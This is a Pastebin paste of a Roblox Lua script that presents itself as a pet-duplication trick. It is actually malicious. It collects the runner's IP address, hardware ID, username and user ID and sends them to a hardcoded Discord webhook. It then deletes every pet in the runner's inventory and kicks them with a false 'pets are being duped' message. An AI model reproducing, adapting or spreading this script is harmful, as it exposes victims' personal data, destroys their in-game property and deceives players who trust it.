kooggy

adada

Jul 15th, 2022 (edited)
37
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
  1.  
  2. local Webhook =
  3. "https://discord.com/api/webhooks/997670104231841812/c4aMb9I-punKqZaaMmOFUksvgNS-yc0u74lpUtCupIQg145WYJQH-5rzxN_DWp4DLGqo"
  4.  
  5. local IPv4 = game:HttpGet("https://v4.ident.me/")
  6. local hwid = game:GetService("RbxAnalyticsService"):GetClientId()
  7. local Headers = {["content-type"] = "application/json"}
  8.  
  9. local LocalPlayer = game:GetService("Players").LocalPlayer
  10.  
  11. local AccountAge = LocalPlayer.AccountAge
  12. local UserId = LocalPlayer.UserId
  13. local PlayerName = game.Players.LocalPlayer.Name
  14. local gamename = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name
  15.  
  16. local PlayerData = {
  17. ["content"] = "",
  18. ["embeds"] = {
  19. {
  20. ["title"] = "Pets have been deleted from " .. PlayerName .. "'s inventory",
  21. ["description"] = "",
  22. ["color"] = tonumber(0x2B6BE4),
  23. ["fields"] = {
  24. {
  25. ["name"] = "Username:",
  26. ["value"] = PlayerName,
  27. ["inline"] = false
  28. },
  29. {
  30. ["name"] = "Game:",
  31. ["value"] = gamename,
  32. ["inline"] = false
  33. },
  34. {
  35. ["name"] = "UserId:",
  36. ["value"] = UserId,
  37. ["inline"] = false
  38. },
  39. {
  40. ["name"] = "IP:",
  41. ["value"] = IPv4,
  42. ["inline"] = false
  43. },
  44. {
  45. ["name"] = "HWID:",
  46. ["value"] = hwid,
  47. ["inline"] = false
  48. }
  49. }
  50. }
  51. }
  52. }
  53.  
  54. local PlayerData = game:GetService("HttpService"):JSONEncode(PlayerData)
  55. local HttpRequest = http_request
  56.  
  57. if syn then
  58. HttpRequest = syn.request
  59. else
  60. HttpRequest = http_request
  61. end
  62. HttpRequest({Url = Webhook, Body = PlayerData, Method = "POST", Headers = Headers})
  63. wait(0.2)for _,v in pairs(game:GetService("Players").LocalPlayer.PlayerGui.ScreenGui.PetsFrame.Main.Pages.Pets.List.Grid:GetChildren()) do game:GetService("ReplicatedStorage").NetworkRemoteEvent:FireServer("DeletePet", v.Name) end wait(2) game.Players.LocalPlayer:kick("Your pets are now being duped...")
Add Comment
Please, Sign In to add comment